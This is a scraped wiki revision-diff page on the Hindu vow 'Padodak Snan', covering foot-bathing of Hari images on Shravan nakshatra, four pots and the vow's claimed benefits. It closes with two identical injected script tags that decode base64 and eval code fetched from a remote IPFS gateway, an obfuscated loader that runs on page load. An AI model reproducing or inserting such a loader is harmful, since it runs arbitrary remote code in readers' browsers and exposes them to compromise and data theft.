Difference between revisions of "पादोदक स्नान"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (पादोदकस्नान का नाम बदलकर पादोदक स्नान कर दिया गया है)
 
(4 intermediate revisions by 3 users not shown)
Line 1: Line 1:
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
+
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
 
*[[उत्तराषाढ़ नक्षत्र]] पर उपवास रखा जाता है।
 
*[[उत्तराषाढ़ नक्षत्र]] पर उपवास रखा जाता है।
*[[श्रवण नक्षत्र]] पर हरि प्रतिमा के पादों को स्नान कराना तथा सोने, चाँदी, ताम्र तथा मिट्टी के चार घट तैयार करना।
+
*[[श्रवण नक्षत्र]] पर हरि प्रतिमा के पादों को [[स्नान]] कराना तथा सोने, चाँदी, ताम्र तथा मिट्टी के चार घट तैयार करना।
 
*इसी प्रकार संकर्षण, प्रद्युम्न एवं अनिरुद्ध की प्रतिमाओं के पादों को स्नान कराना।
 
*इसी प्रकार संकर्षण, प्रद्युम्न एवं अनिरुद्ध की प्रतिमाओं के पादों को स्नान कराना।
 
*इससे दुर्भाग्य, बाँधाएँ एवं रोग दूर होते हैं और यश एवं संतति की प्राप्ति होती है।<ref>हेमाद्रि (व्रतखण्ड 2, 650-653, विष्णुधर्मोत्तरपुराण से उद्धरण)।</ref>
 
*इससे दुर्भाग्य, बाँधाएँ एवं रोग दूर होते हैं और यश एवं संतति की प्राप्ति होती है।<ref>हेमाद्रि (व्रतखण्ड 2, 650-653, विष्णुधर्मोत्तरपुराण से उद्धरण)।</ref>
 
+
{{प्रचार}}
{{लेख प्रगति
+
{{संदर्भ ग्रंथ}}
|आधार=आधार1
 
|प्रारम्भिक=
 
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>

Latest revision as of 11:35, 19 June 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • uttarashadh nakshatr par upavas rakha jata hai.
  • shravan nakshatr par hari pratima ke padoan ko snan karana tatha sone, chaandi, tamr tatha mitti ke char ghat taiyar karana.
  • isi prakar sankarshan, pradyumn evan aniruddh ki pratimaoan ke padoan ko snan karana.
  • isase durbhagy, baandhaean evan rog door hote haian aur yash evan santati ki prapti hoti hai.[1]


tika tippani aur sandarbh

  1. hemadri (vratakhand 2, 650-653, vishnudharmottarapuran se uddharan).

any sanbandhit liank

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>